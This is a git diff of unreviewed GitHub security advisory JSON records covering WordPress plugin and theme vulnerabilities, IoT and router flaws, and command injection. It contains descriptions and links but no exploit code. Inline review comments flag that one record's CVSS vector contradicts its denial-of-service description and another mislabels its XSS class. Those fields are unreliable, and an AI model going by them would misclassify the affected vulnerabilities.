@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3rcg-gg9q-9688", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69407" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Struktur struktur allows PHP Local File Inclusion.This issue affects Struktur: from n/a through <= 2.5.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69407" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/struktur/vulnerability/wordpress-struktur-theme-2-5-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3rhf-g27v-qpj7/GHSA-3rhf-g27v-qpj7.json b/advisories/unreviewed/2026/02/GHSA-3rhf-g27v-qpj7/GHSA-3rhf-g27v-qpj7.json new file mode 100644 index 0000000000000..f9436584e8fd4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3rhf-g27v-qpj7/GHSA-3rhf-g27v-qpj7.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3rhf-g27v-qpj7", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69403" + ], + "details": "Unrestricted Upload of File with Dangerous Type vulnerability in Bravis-Themes Bravis Addons bravis-addons allows Using Malicious Files.This issue affects Bravis Addons: from n/a through <= 1.1.9.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69403" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/bravis-addons/vulnerability/wordpress-bravis-addons-plugin-1-1-9-arbitrary-file-upload-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3v2x-94p8-whg9/GHSA-3v2x-94p8-whg9.json b/advisories/unreviewed/2026/02/GHSA-3v2x-94p8-whg9/GHSA-3v2x-94p8-whg9.json index 66410bb2ec0b4..528a4894884aa 100644 --- a/advisories/unreviewed/2026/02/GHSA-3v2x-94p8-whg9/GHSA-3v2x-94p8-whg9.json +++ b/advisories/unreviewed/2026/02/GHSA-3v2x-94p8-whg9/GHSA-3v2x-94p8-whg9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3v2x-94p8-whg9", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25315" ], "details": "Missing Authorization vulnerability in hcaptcha hCaptcha for WP hcaptcha-for-forms-and-more allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects hCaptcha for WP: from n/a through <= 4.22.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { 
@@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:15Z" diff --git a/advisories/unreviewed/2026/02/GHSA-3vr9-ghwq-fh8h/GHSA-3vr9-ghwq-fh8h.json b/advisories/unreviewed/2026/02/GHSA-3vr9-ghwq-fh8h/GHSA-3vr9-ghwq-fh8h.json new file mode 100644 index 0000000000000..6df49218fce3c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3vr9-ghwq-fh8h/GHSA-3vr9-ghwq-fh8h.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3vr9-ghwq-fh8h", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26048" + ], + "details": "The Wi-Fi router is vulnerable to de-authentication attacks due to the \nabsence of management frame protection, allowing forged deauthentication\n and disassociation frames to be broadcast without authentication or \nencryption. An attacker can use this to cause unauthorized disruptions \nand create a denial-of-service condition.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26048" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-03.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json b/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json new file mode 100644 index 0000000000000..2742fee72f225 --- /dev/null 
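Review bot: The new GHSA-3vr9-ghwq-fh8h record scores an availability problem as a confidentiality one. Its `details` describe forged deauthentication and disassociation frames causing a denial-of-service condition, yet the vector is `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`, which has no availability impact. The string is identical to the one on GHSA-3fr7-jch8-4qjv (cleartext credentials, same ICSA-26-050-03 references), which suggests it was copied from that record. The `score` line should probably carry `C:N` and a non-`N` availability metric, for example `.../C:N/I:N/A:H`, to be confirmed against the CISA advisory. Until that is corrected upstream, anyone filtering on the vector will misfile this as a data-exposure issue rather than a service-disruption one.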
+++ b/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-42h9-mr3g-6gc2", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26721" + ], + "details": "An issue in Key Systems Inc Global Facilities Management Software v.20230721a allows a remote attacker to obtain sensitive information via the sid query parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26721" + }, + { + "type": "WEB", + "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26721" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-42qj-j5qx-4j25/GHSA-42qj-j5qx-4j25.json b/advisories/unreviewed/2026/02/GHSA-42qj-j5qx-4j25/GHSA-42qj-j5qx-4j25.json new file mode 100644 index 0000000000000..a601fbd073115 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-42qj-j5qx-4j25/GHSA-42qj-j5qx-4j25.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-42qj-j5qx-4j25", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22885" + ], + "details": "A vulnerability exists in EnOcean SmartServer IoT version 4.60.009 and \nprior, which would allow remote attackers, in the LON IP-852 management \nmessages, to send specially crafted IP-852 messages resulting in a \nmemory leak from the program's memory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22885" + }, + { + "type": "WEB", + "url": "https://enoceanwiki.atlassian.net/wiki/spaces/DrftSSIoT/pages/1475410/SmartServer+IoT+Release+Notes#Current-Stable-Release" + }, + { + "type": "WEB", + "url": "https://enoceanwiki.atlassian.net/wiki/spaces/IEC/pages/288063529/Enhancing+Security" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-01.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-42vx-f9wx-wg3r/GHSA-42vx-f9wx-wg3r.json b/advisories/unreviewed/2026/02/GHSA-42vx-f9wx-wg3r/GHSA-42vx-f9wx-wg3r.json new file mode 100644 index 0000000000000..ab3b5a827cb54 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-42vx-f9wx-wg3r/GHSA-42vx-f9wx-wg3r.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-42vx-f9wx-wg3r", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26093" + ], + "details": "Improper Neutralization of Special Elements used in a Command ('Command Injection') in Owl opds 2.2.0.4 allows Command Injection via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26093" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26093" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json b/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json new file mode 100644 index 0000000000000..5d71126f9afd7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-43rm-rg7w-7rjf", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68863" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zack Katz iContact for Gravity Forms gravity-forms-icontact allows Reflected XSS.This issue affects iContact for Gravity Forms: from n/a through <= 1.3.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68863" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/gravity-forms-icontact/vulnerability/wordpress-icontact-for-gravity-forms-plugin-1-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json b/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json new file mode 100644 index 0000000000000..0d4372d3c8b9d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-43ww-vg8r-97hv/GHSA-43ww-vg8r-97hv.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-43ww-vg8r-97hv", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22374" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Zio Alberto zioalberto allows PHP Local File Inclusion.This issue affects Zio Alberto: from n/a through <= 1.2.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22374" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/zioalberto/vulnerability/wordpress-zio-alberto-theme-1-2-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-46ph-2qpx-729g/GHSA-46ph-2qpx-729g.json b/advisories/unreviewed/2026/02/GHSA-46ph-2qpx-729g/GHSA-46ph-2qpx-729g.json new file mode 100644 index 0000000000000..895a5f0e5131c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-46ph-2qpx-729g/GHSA-46ph-2qpx-729g.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-46ph-2qpx-729g", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69395" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Gable gable allows PHP Local File Inclusion.This issue affects Gable: from n/a through <= 1.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69395" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/gable/vulnerability/wordpress-gable-theme-1-5-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-47ph-88gx-hg42/GHSA-47ph-88gx-hg42.json b/advisories/unreviewed/2026/02/GHSA-47ph-88gx-hg42/GHSA-47ph-88gx-hg42.json new file mode 100644 index 0000000000000..989e18355871d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-47ph-88gx-hg42/GHSA-47ph-88gx-hg42.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47ph-88gx-hg42", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-2846" + ], + "details": "A security vulnerability has been detected in UTT HiPER 520 1.7.7-160105. This impacts the function sub_44D264 of the file /goform/formPdbUpConfig of the component Web Management Interface. The manipulation of the argument policyNames leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2846" + }, + { + "type": "WEB", + "url": "https://github.com/cha0yang1/UTT520CVE/blob/main/UTTRCE1.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347082" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347082" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753964" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-48pc-4fq3-jhwg/GHSA-48pc-4fq3-jhwg.json b/advisories/unreviewed/2026/02/GHSA-48pc-4fq3-jhwg/GHSA-48pc-4fq3-jhwg.json new file mode 100644 index 0000000000000..0e22dc6173df3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-48pc-4fq3-jhwg/GHSA-48pc-4fq3-jhwg.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-48pc-4fq3-jhwg", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69322" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes PeakShops peakshops allows PHP Local File Inclusion.This issue affects PeakShops: from n/a through < 1.5.9.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69322" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/peakshops/vulnerability/wordpress-peakshops-theme-1-5-9-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4cfj-pm5j-9qhf/GHSA-4cfj-pm5j-9qhf.json b/advisories/unreviewed/2026/02/GHSA-4cfj-pm5j-9qhf/GHSA-4cfj-pm5j-9qhf.json index 3037f3d81cec8..11eeeef4d6a1b 100644 --- a/advisories/unreviewed/2026/02/GHSA-4cfj-pm5j-9qhf/GHSA-4cfj-pm5j-9qhf.json +++ b/advisories/unreviewed/2026/02/GHSA-4cfj-pm5j-9qhf/GHSA-4cfj-pm5j-9qhf.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4cfj-pm5j-9qhf", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25326" ], "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in cmsmasters CMSMasters Content Composer cmsmasters-content-composer allows PHP Local File Inclusion.This issue affects CMSMasters Content Composer: from n/a through <= 1.4.5.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-98" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4f62-jjjx-4hrr/GHSA-4f62-jjjx-4hrr.json b/advisories/unreviewed/2026/02/GHSA-4f62-jjjx-4hrr/GHSA-4f62-jjjx-4hrr.json new file mode 100644 index 0000000000000..df67a8bad9492 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4f62-jjjx-4hrr/GHSA-4f62-jjjx-4hrr.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4f62-jjjx-4hrr", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22384" + ], + "details": "Deserialization of Untrusted Data vulnerability in leafcolor Applay - Shortcodes applay-shortcodes allows Object Injection.This issue affects Applay - Shortcodes: from n/a through <= 3.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22384" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/applay-shortcodes/vulnerability/wordpress-applay-shortcodes-plugin-3-7-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4fcf-69p7-63vf/GHSA-4fcf-69p7-63vf.json b/advisories/unreviewed/2026/02/GHSA-4fcf-69p7-63vf/GHSA-4fcf-69p7-63vf.json new file mode 100644 index 0000000000000..670417b0889e5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4fcf-69p7-63vf/GHSA-4fcf-69p7-63vf.json 
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4fcf-69p7-63vf",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2025-15583"
+ ],
+ "details": "A weakness has been identified in detronetdip E-commerce 1.0.0. This affects the function get_safe_value of the file utility/function.php. Executing a manipulation can lead to cross site scripting. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15583"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/detronetdip/E-commerce/issues/23"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Nixon-H/PHP-Stored-XSS-Bypass-Real-Escape"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/detronetdip/E-commerce"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346487"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346487"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754033"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4ff7-6hm2-x86r/GHSA-4ff7-6hm2-x86r.json b/advisories/unreviewed/2026/02/GHSA-4ff7-6hm2-x86r/GHSA-4ff7-6hm2-x86r.json
new file mode 100644
index 0000000000000..3544edcf3c2cd
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4ff7-6hm2-x86r/GHSA-4ff7-6hm2-x86r.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4ff7-6hm2-x86r",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68536"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Zota zota allows PHP Local File Inclusion.This issue affects Zota: from n/a through <= 1.3.14.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68536"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/zota/vulnerability/wordpress-zota-theme-1-3-14-local-file-inclusion-vulnerability-2?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json b/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json
new file mode 100644
index 0000000000000..c9d372c9ff3e2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4fwr-9c58-jg7x",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68856"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in keeswolters Mopinion Feedback Form mopinion-feedback-form allows DOM-Based XSS.This issue affects Mopinion Feedback Form: from n/a through <= 1.1.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68856"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/mopinion-feedback-form/vulnerability/wordpress-mopinion-feedback-form-plugin-1-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4ggr-f4xw-9446/GHSA-4ggr-f4xw-9446.json b/advisories/unreviewed/2026/02/GHSA-4ggr-f4xw-9446/GHSA-4ggr-f4xw-9446.json
new file mode 100644
index 0000000000000..be351c499944c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4ggr-f4xw-9446/GHSA-4ggr-f4xw-9446.json
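Review bot: In GHSA-4fwr-9c58-jg7x the `details` string classifies the flaw as `DOM-Based XSS`, while the Patchstack reference slug in the same record reads `reflected-cross-site-scripting-xss`. The two classes are remediated and detected in different places (client-side sink handling versus server-side output encoding), so the record as written points a triager in two directions. Because `"affected": []` and `"severity": []` are both empty here, the prose is the only classification a consumer has; I would confirm the class against the linked advisory before relying on it.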
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4ggr-f4xw-9446",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68514"
+ ],
+ "details": "Authorization Bypass Through User-Controlled Key vulnerability in Cozmoslabs Paid Member Subscriptions paid-member-subscriptions allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Paid Member Subscriptions: from n/a through <= 2.16.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68514"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/paid-member-subscriptions/vulnerability/wordpress-paid-member-subscriptions-plugin-2-16-8-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4gvf-3g6g-c2mg/GHSA-4gvf-3g6g-c2mg.json b/advisories/unreviewed/2026/02/GHSA-4gvf-3g6g-c2mg/GHSA-4gvf-3g6g-c2mg.json
new file mode 100644
index 0000000000000..4b1d0b5fad4ac
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4gvf-3g6g-c2mg/GHSA-4gvf-3g6g-c2mg.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4gvf-3g6g-c2mg",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68048"
+ ],
+ "details": "Missing Authorization vulnerability in XLPlugins NextMove Lite woo-thank-you-page-nextmove-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects NextMove Lite: from n/a through <= 2.23.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68048"
+ },
+ {
+ "type": "WEB",
